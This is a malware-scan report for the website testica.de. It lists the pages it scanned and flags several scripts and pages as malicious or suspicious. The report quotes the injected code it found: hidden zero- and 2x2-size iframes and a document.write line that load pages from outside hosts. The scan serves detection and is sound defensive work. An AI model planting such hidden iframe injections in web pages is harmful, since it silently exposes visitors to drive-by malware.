Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=testica.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.testica.de/ | 200 OK Content-Length: 17185 Content-Type: text/html | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://www.testica.de/impressum.html | 200 OK Content-Length: 4438 Content-Type: text/html | clean |
http://www.testica.de/index.html | 200 OK Content-Length: 17185 Content-Type: text/html | clean |
http://www.testica.de/diverses/internameintro.html | 200 OK Content-Length: 3902 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://atcministries.net/mhwf.html?i=1476852 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?i=1476852> | ||
http://www.testica.de/diverses/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11927 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?j=1476852></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://atcministries.net/mhwf.html?j=1476852 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?j=1476852> | ||
http://www.testica.de/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
http://www.testica.de/intername/index.html | 200 OK Content-Length: 2082 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://atcministries.net/mhwf.html?i=1476852 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?i=1476852> | ||
http://www.testica.de/intername/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11927 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?j=1476852></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://atcministries.net/mhwf.html?j=1476852 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?j=1476852> | ||
http://www.testica.de/ivs/xmas.html | 404 Not Found Content-Length: 287 Content-Type: text/html | clean |
http://www.testica.de/moviepark/halloween.html | 200 OK Content-Length: 4253 Content-Type: text/html | clean |
http://www.testica.de/moviepark/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11767 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) Decoded script: <iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div> Antivirus reports:
| ||
http://www.testica.de/moviepark/parkplan.html | 200 OK Content-Length: 1884 Content-Type: text/html | clean |
http://www.testica.de/animotrix/index.html | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://www.testica.de/diverses/jamintro.html | 200 OK Content-Length: 4338 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://atcministries.net/mhwf.html?i=1476852 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://atcministries.net/mhwf.html?i=1476852> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: testica.de
Result:
GET / HTTP/1.1
Host: testica.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: testica.de
Referer: http://www.google.com/search?q=testica.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: testica.de
Referer: http://www.google.com/search?q=testica.de
Result:
The result is similar to the first query. There are no suspicious redirects found.